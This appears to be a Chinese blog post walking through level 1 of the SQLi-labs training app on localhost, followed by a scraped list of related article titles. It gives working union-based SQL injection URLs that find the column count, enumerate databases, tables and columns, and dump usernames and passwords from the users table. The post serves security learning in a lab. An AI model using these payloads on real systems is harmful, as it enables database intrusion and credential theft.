sqli-labs第一关(MySql基础)
url中#号无效,在url中使用%23代替#,或使用两个减号
--
代替注释,注意两个减号后常根一个加号+
,被解析为空格,以注释掉后面的引号完成闭合字符串中所有字符都可以使用16进制输入(需要加0x)
探测有多少列:
localhost/sqli-labs-master/Less-1/?id=1' order by 2--+
,通过order by来探测列数利用group_concat来在一行内显示多个信息
探测union注入:
localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, 3--+
(3列)查询所有库名:
select group_concat(schema_name) from information_schema.SCHEMATA
example:localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, (select group_concat(schema_name) from information_schema.SCHEMATA)--+
查询security库中所有表名:
select group_concat(table_name) from information_schema.TABLES where table_schema = 'security'
example:http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, (select group_concat(table_name) from information_schema.TABLES where table_schema = 'security')--+
查询user表中所有列名:
select group_concat(column_name) from information_schema.columns where table_name = 'users'
example:http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, (select group_concat(column_name) from information_schema.columns where table_name = 'users')--+
查询user表中信息:
select group_concat(concat_ws('~', username,password)) from users
(使用concat_ws()是为了分割数据,防止数据粘在一起)
example:http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1, 2, (select group_concat(concat_ws('~', username,password)) from users)--+
sqli-labs第一关(MySql基础)相关推荐
- Mysql基础到进阶精品视频教程附讲义文档 91课
课程介绍 Mysql基础 本章主要是php开发中Mysql基础知识的学习,包括MySQL的简单介绍和安装.MySQL管理工具的使用.表的建立.数据的查询.数据的修改和数据的增加等等,全面掌握php网站 ...
- Mysql 基础语法应用
第一章 MySQL基础介绍 1.数据库的基本概念数据库: DataBase 简称 DB作用: 用于永久性存储和管理数据的仓库 2.常见的数据库A.MySQL 简单的免费的数据库 ---> 现在学 ...
- 第一阶段----MySQL学习----基础篇
第一阶段----MySQL学习----基础篇 数据库-基础篇 MySql版本要求 基本语法 DQL语法 基本查询 条件查询 聚合函数 分组查询 排序查询 分页查询 语句练习 执行顺序 DCL-用户操作 ...
- MySQL基础_模糊查询—between and in is null <=>(安全等于)等关建字
文章目录 MySQL基础_模糊查询-in关键字 MySQL基础_模糊查询-is null关键字 MySQL基础_[补充]安全等于的介绍 eg: select * from table where 字段 ...
- MySQL基础学习——第一篇
目录 MySQL定义 MySQL的安装 MySQL打开 MySQL常用数据类型 一,数值类型 二,日期和时间类型 三,字符串类型 MySQL基础命令 一,关于库的内容 1,怎创建数据库 2,删除数据库 ...
- SQL注入之union联合注入——sql-lab第一关(非常非常详细的过程)
SQL注入介绍 什么是SQL注入: SQL注入是(SQLi)是一种注入攻击,可以执行恶意的SQL语句,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器.攻击者 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- SQL注入之时间盲注 和 报错注入(sql-lab第一关为例)
什么是时间盲注 时间盲注指通过页面执行的时间来判断数据内容的注入方式,通常用于数据(包含逻辑型)不能返回到页面中的场景,无法利用页面回显判断数据内容,只能通过执行的时间来获取数据. 时间盲注的过程 1 ...
- MySQL基础总结(一)
MySQL基础总结(一) 文章目录 MySQL基础总结(一) 一.MySQL架构 1.MySQL架构图 2.SQL语句在MySQL中的执行流程 二.存储引擎 1.查看存储引擎 2.设置存储引擎 3.存 ...
最新文章
- 伍迷创意随想集 之 网游与旅游结合新玩法
- python dict 字典 清空
- TensorFlow 相关 URL
- 断网python第三方库安装_断网环境下利用pip安装Python离线安装包(转载)
- AI到底有多吃香?推荐一个斯坦福、CMU、清北学生都在上的AI课
- linux 打开网页 用curl_linux终端模拟浏览器访问(curl)
- 锁是网络数据库中的一个非常重要的概念
- 企业如何杜绝云端数据泄密?
- python复制sheet_python excel sheet复制
- Command 和 Active Object 模式
- atitit.eclipse 新特性总结3.1--4.3
- 使用npm和命令行强制删除文件
- CVPR2021 视频目标检测论文推荐
- 精心打造中国第一个商用3G网络
- 微信文章临时链接变永久链接
- iphone12绿色好看 iphone12系列哪个颜色好看
- 推荐一款技术人必备的接口测试神器:Apifox
- Project Professional安装:Windows Installer(MSI)与即点即用
- 区块链共识算法(4)分布式一致性算法Paxos
- 【我的书】Unity Shader的书 — 文件夹(2015.12.21更新)
热门文章
- 五一假期将至,机房维护工作要做好
- 压缩机电流保护原因是什么?压缩机烧毁常见原因有哪些?
- 数据中心机房供电需求有哪些?存在哪些电能质量问题?
- 网络运维工作是什么的?
- python中变量名有哪些_Python变量范围有哪些?如何在Python中定义变量?
- AI:2020年6月23日北京智源大会演讲分享之智能信息检索与挖掘专题论坛——09:55-10:40刘欢教授《Challenges in Combating Disinformation》
- Algorithm:C++语言实现之链表相关算法(单链公共结点问题、一般LCA、括号匹配、最长括号匹配、逆波兰表达式Reverse Polish Notation、直方图矩形面积、收集雨水问题)
- Sql:成功解决将sql输出的datetime时间格式转为常规格式
- 将js进行到底:node学习10
- asp.net 二级域名(路由方式实现)